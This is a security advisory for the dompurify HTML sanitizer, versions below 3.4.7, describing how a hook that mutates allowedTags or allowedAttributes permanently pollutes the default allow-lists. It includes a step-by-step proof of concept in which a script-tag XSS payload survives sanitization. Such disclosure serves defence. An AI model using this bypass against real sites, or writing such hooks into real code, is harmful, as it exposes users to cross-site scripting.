Trust Boundary Violation Affecting dompurify package, versions <3.4.7

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Trust Boundary Violation through the mutation of data.allowedTags or data.allowedAttributes in hooks, which directly alters the global default sets used for sanitization. An attacker can cause persistent changes to the default allow-lists, enabling malicious tags or attributes to bypass sanitization in subsequent calls by injecting payloads that exploit the polluted configuration.

Note:

This is only exploitable if a hook is registered that mutates data.allowedTags or data.allowedAttributes, and later sanitization occurs without explicitly setting restrictive configuration arrays.

// 1) fresh DOMPurify, default config — script is blocked
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg></svg>"

// 2) install a hook that mutates data.allowedTags (natural-looking pattern)
DOMPurify.addHook('uponSanitizeElement', (node, data) => {
  data.allowedTags['script'] = true;
});

// 3) one sanitize call WITH the hook — script survives (expected during the hook)
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg><script>alert(1)</script></svg>"

// 4) remove the hook
DOMPurify.removeAllHooks();
DOMPurify.clearConfig();

// 5) sanitize attacker content with default config — POLLUTION PERSISTS
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg><script>alert(1)</script></svg>"  ← script survived without any hook

// 6) the only recovery: create a fresh DOMPurify instance
const fresh = DOMPurify(window);
fresh.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg></svg>"  ← clean

• GitHub Advisory
• GitHub Commit